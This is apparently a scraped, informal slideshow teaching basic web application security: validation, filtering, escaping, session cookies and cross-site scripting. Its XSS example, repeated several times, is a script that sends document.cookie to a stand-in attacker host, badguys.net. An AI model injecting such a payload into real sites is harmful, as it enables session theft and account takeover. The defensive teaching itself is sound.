760 likes | 910 Vues
Basic Web Application Security. User Input. Kick Your Arse. Three Ways. (All Awesome). Validation. Passive. (No touchy-touchy). This is a Number. 2. This is not a Number. a. This is really not a Number. <script>alert(‘ loldongs ’)</script>. Filtering. Destructive. (One-Way Street).
E N D
Three Ways (All Awesome)
Passive (No touchy-touchy)
This is really not a Number. <script>alert(‘loldongs’)</script>
Destructive (One-Way Street)
What’s the diff? (Bro.)
What happens when you screw it up? White-Listing Usability Problems Black-Listing Security Problems (Always a trade-off.)
Transport Point A Point B
HTML <b>Huh.</b> <p><i><b>Huh.</b></i></p> <b>Huh</b>
SQL Sam O’Brien INSERT INTO mah_peeps (name) VALUES (‘Sam O\’Brien‘); 1, Sam O’Brien, 2010-09-02 18:30:00
XSS (Cross-Site Scripting)
SS (XTREME Site Scripting)
Sticking Scripts Where They Don’t Belong. You there, down the back. Stop sniggering.
<script>document.write(‘<img src=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script> Oh shit.
Why is this uncool? (Yeah! Why?)
<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script> Ooooh shit.
<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script> Oooooooooooh shit.
<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script> Oooooooooooooooooh shit.
Why is this really uncool? (Because shut up.)
HTTP Hyper-Text Thingy I-forgot-again
It can guess.(Badly.) IP Address Browser User-Agent
Sends a cookie with each request. (A basket of goodies that the browser sends faithfully every request.)
The Server puts a unique ID in the basket. PHPSESSID=123your456mum789 __utma=12948.23.4211414.5553 is_a_furry=1
Browser sends the ID every request. PHPSESSID=123your456mum789
<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script> Look again.
THEY HAVE YOUR COOKIE. Ooooooooooooooooooooooo-
HTML Validation Really Hard.
HTML Filtering Still Really Hard. • Use a library, eg. HTML Purifier.
HTML Escaping Dead Easy. Most languages have stuff to handle this, eg. htmlentities(), cgi.escape(), CGI.escape()
How hard is filtering? (It’s just <script>, right?)